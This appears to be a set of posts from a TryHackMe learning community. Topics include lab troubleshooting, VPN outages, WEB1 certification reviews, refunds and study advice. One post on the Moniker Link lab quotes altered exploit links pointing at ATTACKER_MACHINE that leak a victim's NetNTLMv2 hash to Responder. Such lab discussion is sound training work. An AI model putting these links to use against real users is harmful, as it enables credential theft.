Level 1 taught you what to do with an alert. Level 2 teaches you what to do about it.
SOC Level 2 is completely rebuilt, 76 rooms across the environments hiring managers actually screen for at L2: Microsoft 365, Entra, AWS, Active Directory, and detection engineering. Kick things off with THE DEEP DIVE & 150 SAL2 cert prizes on the table until Aug 27🎯
I’ve been stuck on the Biteme room for two days. I found the correct file under /console/, but every time I request it, I get a 403 Forbidden.(used diffrent tools still getting same outcome)
I spent hours trying every manual bypass with no luck. I finally caved and checked a walkthrough, only to realize I was doing exactly what I was supposed to do.
The frustrating part is the walkthrough gets a 200 OK instantly on the exact same request.
Any idea how to solve this machine ? or am i doing something wrong.
(sorry for bad english or AI)
I've been trying to learn the basic web vulns from portswigger web academy. The issue isn't that I'm not trying hard enough... the issue is the academy doesn't exactly teach you what payloads you may need, or what exact kind of situations you may cone across.
Can anyone, from a newbie who just started to a professional give me a proper learning technique, and I mean in detail cuz I've seen enough "learn from tryhackme, hackthebox etc etc", I just need the methodology on how to learn. Pls and ty.
Hello everyone! I'm fairly new to the world of cybersecurity. I just finished a basic CTF-oriented course that ended with an AD competition that I didn't even get to play, since I wasn't in the top 5.
Next year I'll become a tutor for this course for the pwn category (we just learned up to basic BOF and basic ROP).
I personally found frustrating the approach "solve CTFs and learn without any idea how". So for future students, I decided to create some beginner-friendly CTFs — exercises that give major hints to actually learn different attacks before having to search for them specifically on different CTFs.
My questions to all of you are:
\\- What's a good approach to learn? (An ideal one I mean)
\\- What do CTFs and general courses usually lack for beginners?
\\- What tricks were useful to learn that should be taught right from the start?
Is it only me or the VPN server has been acting weird lately. 2 or 3 days ago I tried to connect through VPN as I always do, but it kept hitting AUTH_FAILED. I usually use openvpn, I tried regenrating the configuration file but still the same.
I even installed the other vpn Squawker-Vpn but still didnt work.
I connect to the Europe Frankfort server. Idk what's the problem.
So I was working on the Moniker Link Room and while messing around with the provided POC Code from cmnatic, I found a way to get the netNTLMv2 hash that was not mentioned in the walkthrough.
In the provided Code I just changed one line "file://ATTACKER_MACHINE/test!exploit" to "http://ATTACKER_MACHINE/test!exploit"
Back to the victim's VM after clicking on that link, Internet Explorer opened and Windows Security prompts you to enter your credentials. This resulted in an HTTP authentication instead and the Responder captured the hash over HTTP.
Surprisingly by replacing it with "file:ATTACKER_MACHINE/test!exploit" without // triggers the same behavior.
So I have not figured out a new technique but triggered a different URI or protocol handler. Does anyone know why that happens or had a similar experience?
I just wanted to share my experience with the Web Application Pentesting exam because honestly, this has been pretty frustrating.
I took the exam last week and managed to get the Black Box, White Box, and 2 flags on the Grey Box. Everything was going well, and I had around 12 hours remaining.
Then suddenly, the network broke down.
I tried resetting the network, but I couldn't. The platform just told me to contact support. Because of that, I couldn't continue with the exam.
At that point, I had 3 flags remaining, and I only needed one more flag to pass.
The frustrating part is that my exam period was only 2 days, but my support ticket is now 3 days old and I still haven't received a response. 😅
I'm honestly hesitant to request a retake because I don't even know whether the issue has been fixed. I don't want to start another attempt, get several hours into the exam again, and then have the same thing happen.
I don't want this post to come across as me trying to bash THM. I've learned a lot from the platform and I appreciate the work that goes into the labs and certifications. But when you're taking an ongoing certification exam, having the exam interrupted by a network/platform issue is extremely frustrating.
IMO, certification exams should ideally be isolated from service maintenance or other platform issues. If there's scheduled maintenance or an infrastructure problem, candidates shouldn't have their limited exam time affected by it.
I'm mainly hoping THM can clarify how situations like this are handled and whether affected candidates are given a proper extension or retake when the issue is on the platform side.
Has anyone else experienced something similar during a THM certification exam? How was it handled?
PS: Been refreshing and resetting for the last 12 hours before my exam duration ends
Since yesterday evening, I can't connect to EU Central 1, aka Europe (Berlin). Any other server connects without a problem, but I still can't interact with any of the target VMs (as they are all running in the Frankfurt region), making it pointless. The connection via OpenVPN always fails with an AUTH_FAILED message.
I have tried to initiate the connection using the OpenVPN CLI client on both Kali and Arch Linux, as well as with Squawker VPN. I also tried to connect from my VPS with a separate public IP address, to rule out being IP banned for whatever reason, but the connection still fails. I then also used my brother's OpenVPN config file to try and connect, which also failed.
At midnight (CEST), the connection worked again for a few hours, but now it is again impossible for me to connect to the Frankfurt endpoint.
I already sent support a message describing the problem, but I'm curious if anyone else experiences the same problem. I can't really see this as being an issue only affecting me, since I've ruled out problems with my local network, my account, and even with my public IP.
I am on lineageOS so i figure the app is not loading some kinda google captcha properly. If anyone's found a workaround I'd appreciate it. I have play integrity fix, microg and everything properly configured. Please don't comment "just use the desktop version" if you don't know a solution
For all who experiencing problems with not receiving answer to the responder in lab, we need port 445 that already occupied by samba, just kill the process. (command below)
I recently got a 50% off voucher for SAL2 certification , I am interested more in SAL 1 because I want to break into SOC analyst L1 , and I am more prepared for SAL1 .
If anyone have a 100 % voucher for SAL1 and want to exchange with 50% SAL2 voucher , contact me .
Task 5 what js the name of the powershell script that was executed?
The answer is of total 22 characters and ending with . In last 3 characters.
I tried it many times i search for answers in youtube writeup github everywhere I cant even find the password spraying alerts the told in lab manual. The answer i got from YouTube and write is WinPwn.ps1
Just finished the TryHackMe WEB1 certificate I got to review — intermediate web pentesting specialization. Took me 36 hours over a weekend.
The cert has three sections:
- Black Box (easy, ~30 mins)
- White Box (tricky, ~4 hrs)
- Grey Box (the real deal, ~15+ hrs)
Grey Box is where you actually feel like a pentester. You get minimal info, just creds, and have to find 5 flags. Got 4/5 flags — the NoSQL injection in the Authorization section was brutal.
Overall it's a solid certificate for getting real web pentesting experience....
Key tips tldr if you're attempting it:
- Don't jump straight to grey box, it'll eat all your time
- Check the report dropdown to test vulnerabilities systematically
- Do attempt CTFs before related to vulns cuz they not as simple as we the paths you dont know the exact vuln and you get a pretty huge attack surface so may cause panic if you directllt go attempting after completing just the paths.
also for a detailed review and yapping you can visit here
Hey all, I had the opportunity to take the WEB1 certification and thought I'd share my review here.
The layout:
Whitebox - Your presented with downloadable source code as well as a machine that is nonetheless hosting a web server. Through having access to the backend code, you able to do a code review and search for any mistakes made by the "developer" that an attacker might be able to use to their advantage. I thought this was neat due to the fact I haven't seen anything else like it on an exam.
Greybox - This is where most of your time will end up being spent. It consists of 5 flags that can be found through different vulnerabilities. None of the flags connect to each other, atleast from what I saw. Your given credentials to test the application both authenticated and unauthenticated.
Blackbox - You dive in head first not knowing anything. I'm more used to this style on certifications such as HackTheBox and other THM certs. I really enjoyed this part, but there was only 1 flag to capture.
Overall, it is a pretty well constructed certification. The style of the certification is far different from any certification I have taken before. There is a Whitebox, Blackbox, and Greybox section. All individual from each other. I think together they help to develop and prove the skills of a well-rounded basic web penetration tester.
What I thought could be better: I do like the style of the exam with the different types of boxes, but I, personally, did not like how the flags were separate from each other. I enjoy being able to walk down a machine and get interactive and attempt to move from one machine to the next. I know that isn't the purpose of a Web certification, but I would have liked it more if the vulnerabilities correlated or allowed for using the vulnerability to further access of some sort. Some of the vulnerabilities were a lot more difficult than the others, which I did enjoy. I do think the content covered a wide variety of Web topics, but I would never be against more. Also, I do wish that the blackbox and possibly the whitebox had more than just 1 flag each vs it seeming like majority of the exam is based off solely the Greybox portion.
Overall, a pretty decent cert, but definitely challenging. As for tips, don't spend all of your time on the greybox. Try to knock out the Blackbox and Whitebox before putting the rest of your time into Greybox. Use the report section as a guide of all the vulnerabilities that could exist and keep your head up. Also, do the course or atleast some of it before diving into the exam itself to better prepare yourself.
I recently realized my TryHackMe subscription auto-renewed without me knowing, and I immediately sent an email to support (support@tryhackme.com) requesting a refund. I am well within the 7-day window and haven't used any premium rooms since the charge went through.
For anyone who has gone through the refund process for an accidental auto-pay before: How long does it usually take for the support team to reply to emails
Would I have better luck opening a ticket through the on-site chat bot instead of just waiting on the email?
I'm not sure why im getting this error (im still new to cybersecurity). I checked a walkthrough of this that i found and apparently they used same exact command but no error like mine was outputted. That video was uploaded in 2023 tho in case that helps.